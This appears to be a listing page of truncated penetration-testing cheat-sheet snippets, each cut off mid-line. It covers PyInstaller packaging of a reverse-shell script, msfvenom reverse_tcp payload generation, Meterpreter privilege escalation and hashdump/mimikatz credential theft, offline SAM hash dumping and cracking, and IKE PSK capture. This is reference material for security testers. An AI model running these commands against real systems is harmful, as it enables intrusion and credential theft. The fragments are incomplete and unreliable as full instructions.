[+] Reminders
LOG EVERYTHING!
Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop
Set IP address
ifconfig eth0 192.168.50.12/24
Set default gateway
route add default gw 192.168.50.9
Set DNS servers
echo "nameserver 192.168.100.2&q...
Score: 0
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile your_main_file.py
[+] Rebuild your package.
python pyinstaller.py your_main...
Score: 0
The Checklist
[+] Information Gathering
Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as...
Score: 0
Tools within Kali:
oscanner
root@kali:~# oscanner -s 192.168.1.15 -P 1040
sidguess
root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt
tnscmd10g
root@kali:~# tnscmd10g version -h 192.168.1.20
Nmap
nmap -p 1521 -A 192.168.15.205
Nmap nse scripts
Metasploit auxiliaries...
Score: 0
[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux
# Install bridge-utils
sudo apt-get install bridge-utils
# Disable network-manager + firewall
# Configuration
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0
sudo tcpdump -i br0...
Score: 0
------------------------------------------ Mobile Application Test Notes (iPhone)
Prepping Device and Application:
[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
[+] Enable SSH on iPhone/iPad
[+] Install iFunbox to install the application (http://www.i-funbox.com)
[+] Connect device to lab wireless network
[+] Add web proxy se...
Score: 0
[+] Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f ex...
Score: 0
[+] Meterpreter Shell
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > load/use mimikatz
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt...
Score: 0
fdisk -l
mount -t ntfs /dev/sda1 /mnt
df -k
cd /mnt
ls
cd WINDOWS/system32/config
ls
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
john /root/hash.txt -format=nt2 -users=Administrator
cd /root/.john
ls -l
cat john.pot...
Score: 0
Aggressive Mode VPN -- IKE-Scan, PSK-Crack
In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump an...
Score: 0